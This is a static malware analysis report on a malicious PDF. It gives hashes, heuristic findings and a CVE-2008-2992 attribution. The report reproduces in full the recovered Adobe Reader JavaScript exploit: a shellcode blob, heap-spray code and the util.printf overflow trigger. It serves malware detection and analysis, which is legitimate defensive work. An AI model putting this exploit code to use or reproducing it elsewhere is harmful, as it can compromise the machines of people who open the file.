Malicious PDF — malware analysis report

Static analysis result for SHA-256 9cb6de5ad7f474a4…

MALICIOUS

PDF

2.0 KB Authoring application: Python PDF Library 055 http072057057pybrary056net057pyPdf057 First seen: 2013-02-22
MD5: 82d753a51517cb6dd8512c689e113671 SHA-1: fe47440ac5ea5c0d9b77d41669b4c6a776db2e38 SHA-256: 9cb6de5ad7f474a49b9c68c090017f8724a70e620e7474bf0575677663a60966
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 Command and Scripting Interpreter: PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as evidenced by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' signal in the static triage. The primary IOC is the extracted JavaScript file itself. The exact intent of the script is unclear due to obfuscation, but it is likely designed to execute malicious code or exploit a PDF reader vulnerability.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink util.printf, associated with CVE-2008-2992. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function exploit() {
    var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4eff%uae54%u225f%ua476%u957e%uad35%ub721%uad35%uab21%u1532%ua63d%uad35%u5121%u4740%u9091%uad35%u7521%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970% …
    blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js pdf-javascript-stream PDF /JS object 9 at offset 0x2EE 1794 bytes
SHA-256: 065da6f8643d44e8d4dc791d2c2935c74a3948d7f7f55dbbdc2d8b7866f71c32
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function repeat(count,what) {
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4eff%uae54%u225f%ua476%u957e%uad35%ub721%uad35%uab21%u1532%ua63d%uad35%u5121%u4740%u9091%uad35%u7521%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970%u9b8d%ua8a9%u0a78%u5251%u0672%u4913%u046f%u28e5%uf43d%u1339%u1068%ue54a%u5835%ue849%uc842%uf15c%ud88d%u70f0%ub473%u7091%ua043%ueecf%ud88d%u7218%u1443%u2570%u2d3f%u73a4%ua651%ucdd0%u9787%ue4e4%u8486%u68e9%ubc2f%ue420%u2dd3%ua435%ub239%u5513%u07eb%ue4e4%u2402%u6339%uf3f1%uf9e2%u4128%u92e4%u5147%u92b5%u36f4%ufeee%u648d%u4d1b%ub9dd%u3e8f%ue9f5%u437c%u9278%ua1b4%u36f4%ubd50%u48cd%u2704%u6536%u3e90%u6548%u2761%u65cd%u3e90%uda5e%uaf04%u952f%u71bf%u9b25%u70be%u962a%u70be%u972a%u73be%u9529%u6ef6%u9529%ua3f6%uca5b%u3ff6%u65f5%u9041");
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
bigblock = unescape("%u9090%u9090");
headersize = 20;
wap = headersize+blah.length
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<1400;i++) mm[i] = block + blah;
var s = util.printf("%2147483647.2147483647f",0);
return s;
}
var inBrowser = this.external;
if (inBrowser)
          var shaft = app.setTimeOut("exploit()",1200);
else

this.setAction("WillClose","exploit()");
javascript_obj0009_000_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0x2EE 336 bytes
SHA-256: ffb69cb5fe3fa1f4d571eff8ee2eb20f1e51819bd6b99eca819d2a55915cde83
generic_stage_recovery_000.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 9 at offset 0x2EE 1792 bytes
SHA-256: abaa42071664166f63acd1fbb2a37fd0b97204314e78cf3c5ccf6a9b797ae3ec
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function repeat(count,what) {
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4eff%uae54%u225f%ua476%u957e%uad35%ub721%uad35%uab21%u1532%ua63d%uad35%u5121%u4740%u9091%uad35%u7521%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970%u9b8d%ua8a9%u0a78%u5251%u0672%u4913%u046f%u28e5%uf43d%u1339%u1068%ue54a%u5835%ue849%uc842%uf15c%ud88d%u70f0%ub473%u7091%ua043%ueecf%ud88d%u7218%u1443%u2570%u2d3f%u73a4%ua651%ucdd0%u9787%ue4e4%u8486%u68e9%ubc2f%ue420%u2dd3%ua435%ub239%u5513%u07eb%ue4e4%u2402%u6339%uf3f1%uf9e2%u4128%u92e4%u5147%u92b5%u36f4%ufeee%u648d%u4d1b%ub9dd%u3e8f%ue9f5%u437c%u9278%ua1b4%u36f4%ubd50%u48cd%u2704%u6536%u3e90%u6548%u2761%u65cd%u3e90%uda5e%uaf04%u952f%u71bf%u9b25%u70be%u962a%u70be%u972a%u73be%u9529%u6ef6%u9529%ua3f6%uca5b%u3ff6%u65f5%u9041");
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
bigblock = unescape("%u9090%u9090");
headersize = 20;
wap = headersize+blah.length
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<1400;i++) mm[i] = block + blah;
var s = util.printf("!47483647.2147483647f",0);
return s;
}
var inBrowser = this.external;
if (inBrowser)
          var shaft = app.setTimeOut("exploit()",1200);
else

this.setAction("WillClose","exploit()");